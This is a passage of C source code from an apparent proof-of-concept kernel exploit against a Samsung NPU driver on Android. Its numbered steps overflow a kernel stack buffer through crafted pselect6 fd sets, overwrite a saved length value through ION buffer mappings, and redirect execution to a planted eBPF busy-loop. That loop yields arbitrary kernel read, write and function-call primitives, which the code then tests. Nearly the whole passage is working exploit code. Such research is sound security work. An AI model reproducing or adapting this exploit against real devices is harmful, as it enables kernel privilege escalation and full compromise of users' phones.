			*(uint64_t *) (stack_fds + offset) = value;
			for (;;) {
				offset -= cycle_size;
				if (offset < 0) {
					break;
				}
				*(uint64_t *) (stack_fds + offset) = ~0uLL;
			}
		}
	}
#if ANDROID_APP
	assert(*(uint64_t *) stack_fds == 0);
#endif

	// 21. Based on the desired overflow output, make each file descriptor up to the corrupted
	// n value be a dup of either zero_pipe[read] or one_pipe[read]; at the very beginning of
	// the exploit we made these fds all be dups of zero_pipe[read], so we only need to set the
	// one bits. That way, writing a value to one_pipe[write] will set the output bits we need
	// all together.
	//
	// in    out   ex    rin   rout  rex   pad .......
	// |-----|---Y-|-----|-----|---X-|-----|--|-|-|-|-|-|-|-|-|-|
	// |<----3c0 fds---->|         ^if X is to be 1, make fd X-3c0 one_pipe[read]
#define __FD_IDX(fd)		((fd) / (8 * sizeof(uint64_t)))
#define __FD_BIT(fd)		(1uLL << ((fd) % (8 * sizeof(uint64_t))))
#define __FD_LONG(fdset, fd)	(((uint64_t *)(fdset))[__FD_IDX(fd)])
#define TEST_FD(fdset, fd)	((__FD_LONG(fdset, fd) & __FD_BIT(fd)) != 0)
#define SET_FD(fdset, fd)	(__FD_LONG(fdset, fd) |= __FD_BIT(fd))
	for (int fd = START_FD; fd < corrupted_n; fd++) {
		if (TEST_FD(stack_fds, fd + 3 * n)) {
			dup2_chk(one_pipe[0], fd);
		}
	}

	// 22. Trigger a call to pselect of n and using the first 3 * n bytes of our local
	// "overflown" stack_fds buffer as the input "in", "out", and "ex" fdsets (setting the
	// corresponding bytes in the kernel's stack_fds buffer).
	pselect6_n = n;
	pselect6_input = stack_fds;

	// 23. See victim_thread_func().

	// 24. Once the victim thread has blocked, overwrite the saved value of n on the stack,
	// bumping it from 0x140 to 0x1140.
	usleep(20 * 1000);
	vertex10_set_daddr_write_offset(ion1_map, ion1_to_kernel_stack + saved_n_offset + ION1_OFFSET);
	vertex10_set_daddr_write_offset(ion2_map, ion2_to_kernel_stack + saved_n_offset + ION2_OFFSET);
	vertex10_add_daddr(ncp1_fd, ion1_fd, ION1_SIZE);
	vertex10_add_daddr(ncp2_fd, ion2_fd, ION2_SIZE);

	// 25. Copy an eBPF program to run into the ION buffer. A pointer to this program is passed
	// to __bpf_prog_run32() as the second argument.
	//
	// This program will implement a very simple read/write/execute busy loop: it reads from
	// the ION buffer to see if there's an operation ('r', 'w', or 'x') to run, reads the
	// parameters from the ION buffer, and then executes the operation.
	struct bpf_insn insn[] = {
		// Load base address.
		/*  0 */ BPF_LD_IMM64(BPF_REG_6, bpf_data_address),

		// Load R7 = (in:data + 0); this is the operation to perform.
		/*  2 */ BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_6, 0x000),

		// Check if this operation is 'r'.
		/*  3 */ BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 'r', +4),
		// Load R1 = *(in:data + 8); this is the read address.
		/*  4 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x008),
		// Load R1 = *R1.
		/*  5 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_1, 0),
		// Store *(out:data + 8) = R1.
		/*  6 */ BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 0x108),
		// Done.
		/*  7 */ BPF_JMP_A(13),

		// Check if this operation is 'w'.
		/*  8 */ BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 'w', +4),
		// Load R1 = *(in:data + 8); this is the write address.
		/*  9 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x008),
		// Load R2 = *(in:data + 10); this is the value to write.
		/* 10 */ BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_6, 0x010),
		// Store *R1 = R2.
		/* 11 */ BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0),
		// Done.
		/* 12 */ BPF_JMP_A(8),

		// Check if this operation is 'x'.
		/* 13 */ BPF_JMP_IMM(BPF_JNE, BPF_REG_7, 'x', +7),
		// Load R1 = *(in:data + 10); this is the first argument.
		/* 14 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, 0x010),
		// Load R2 = *(in:data + 18); this is the second argument.
		/* 15 */ BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_6, 0x018),
		// Load R3 = *(in:data + 20); this is the third argument.
		/* 16 */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_6, 0x020),
		// Load R4 = *(in:data + 28); this is the fourth argument.
		/* 17 */ BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_6, 0x028),
		// Load R5 = *(in:data + 30); this is the fifth argument.
		/* 18 */ BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_6, 0x030),
		// Call R0 = function(R1, R2, R3, R4, R5). This call gets patched.
		/* 19 */ BPF_EMIT_CALL(__bpf_call_base - 4),
		// Store *(out:data + 8) = R0.
		/* 20 */ BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0x108),
		// Done. Fallthrough.

		// Store *(out:data + 0) = R7, i.e., record the operation that we just executed.
		/* 21 */ BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_7, 0x100),
		// Jump back to the top of the loop (instruction 2).
		/* 22 */ BPF_JMP_A(-21),
	};
	// We'll have to dynamically patch the call instruction each time we want to call a
	// function.
	struct bpf_insn *bpf_call_insn __attribute__((unused)) = &bpf_insn[19];
	// Copy this eBPF program into the ION buffer.
	memcpy(bpf_insn, insn, sizeof(insn));
	// Helper definitions for kernel_read64(), kernel_write64(), and kernel_call5().
#define BPF_IN_OPERATION	(*(volatile uint64_t *) (bpf_data + 0x000))
#define BPF_OUT_OPERATION	(*(volatile uint64_t *) (bpf_data + 0x100))
#define BPF_OPERATION_READ	'r'
#define BPF_OPERATION_WRITE	'w'
#define BPF_OPERATION_CALL	'x'
#define BPF_IN_READ_ADDRESS	(*(volatile uint64_t *) (bpf_data + 0x008))
#define BPF_OUT_READ_VALUE	(*(volatile uint64_t *) (bpf_data + 0x108))
#define BPF_IN_WRITE_ADDRESS	(*(volatile uint64_t *) (bpf_data + 0x008))
#define BPF_IN_WRITE_VALUE	(*(volatile uint64_t *) (bpf_data + 0x010))
#define BPF_IN_CALL_ARG0	(*(volatile uint64_t *) (bpf_data + 0x010))
#define BPF_IN_CALL_ARG1	(*(volatile uint64_t *) (bpf_data + 0x018))
#define BPF_IN_CALL_ARG2	(*(volatile uint64_t *) (bpf_data + 0x020))
#define BPF_IN_CALL_ARG3	(*(volatile uint64_t *) (bpf_data + 0x028))
#define BPF_IN_CALL_ARG4	(*(volatile uint64_t *) (bpf_data + 0x030))
#define BPF_OUT_CALL_RESULT	(*(volatile uint64_t *) (bpf_data + 0x108))
	// Read a 64-bit value from kernel memory.
#define kernel_read64(_address)	({ \
		BPF_IN_OPERATION = 0; \
		while (BPF_OUT_OPERATION != 0) {} \
		BPF_IN_READ_ADDRESS = _address; \
		__builtin_arm_dsb(15); \
		BPF_IN_OPERATION = BPF_OPERATION_READ; \
		do { \
			__builtin_arm_dsb(15); \
		} while (BPF_OUT_OPERATION != BPF_OPERATION_READ); \
		BPF_OUT_READ_VALUE; \
	})
	// Write a 64-bit value to kernel memory.
#define kernel_write64(_address, _value)	({ \
		BPF_IN_OPERATION = 0; \
		while (BPF_OUT_OPERATION != 0) {} \
		BPF_IN_WRITE_ADDRESS = _address; \
		BPF_IN_WRITE_VALUE = _value; \
		__builtin_arm_dsb(15); \
		BPF_IN_OPERATION = BPF_OPERATION_WRITE; \
		do { \
			__builtin_arm_dsb(15); \
		} while (BPF_OUT_OPERATION != BPF_OPERATION_WRITE); \
	})
	// Call a kernel function with 5 arguments and return the 64-bit return value.
#define kernel_call5(_address, _arg0, _arg1, _arg2, _arg3, _arg4)	({ \
		BPF_IN_OPERATION = 0; \
		while (BPF_OUT_OPERATION != 0) {} \
		*bpf_call_insn = BPF_EMIT_CALL(_address); \
		BPF_IN_CALL_ARG0 = _arg0; \
		BPF_IN_CALL_ARG1 = _arg1; \
		BPF_IN_CALL_ARG2 = _arg2; \
		BPF_IN_CALL_ARG3 = _arg3; \
		BPF_IN_CALL_ARG4 = _arg4; \
		__builtin_arm_dsb(15); \
		BPF_IN_OPERATION = BPF_OPERATION_CALL; \
		do { \
			__builtin_arm_dsb(15); \
		} while (BPF_OUT_OPERATION != BPF_OPERATION_CALL); \
		BPF_OUT_CALL_RESULT; \
	})

	// 26. Write a value to one_pipe[write] in order to unblock pselect6() and make do_select()
	// write the desired stack contents past the bounds of the stack_fds buffer. When
	// core_sys_select() returns, it will jump to __bpf_prog_run32() with X1 set to our eBPF
	// program. After this, our read/write/execute gadgets should work.
	LOG("Triggering stack corruption");
	write(one_pipe[1], "b", 1);

	// At this point we should have kernel read/write/execute. The system is not fully stable:
	// the eBPF program is still busy looping on the victim thread. But we now have reliable
	// primitives and can patch the system up as desired.
	kernel_read64(victim_stack - 8);
	LOG("Established kernel read/write/execute");
	// Dump the victim thread's kernel stack.
	for (int offset = 0x400; offset >= 8; offset -= 8) {
		LOG("%lx  %016lx", victim_stack - offset, kernel_read64(victim_stack - offset));
	}
	sleep(2);
	kernel_call5(__bpf_call_base - 4, 0x1111, 0x2222, 0x3333, 0x4444, 0x5555);

	LOG("Done");
	for (;;) {
		sleep(1);
	}
}

// ---- Main --------------------------------------------------------------------------------------

#if !ANDROID_APP

int main(int argc, const char *argv[]) {
	samsung_npu_driver_exploit();
	return 0;
}

#endif
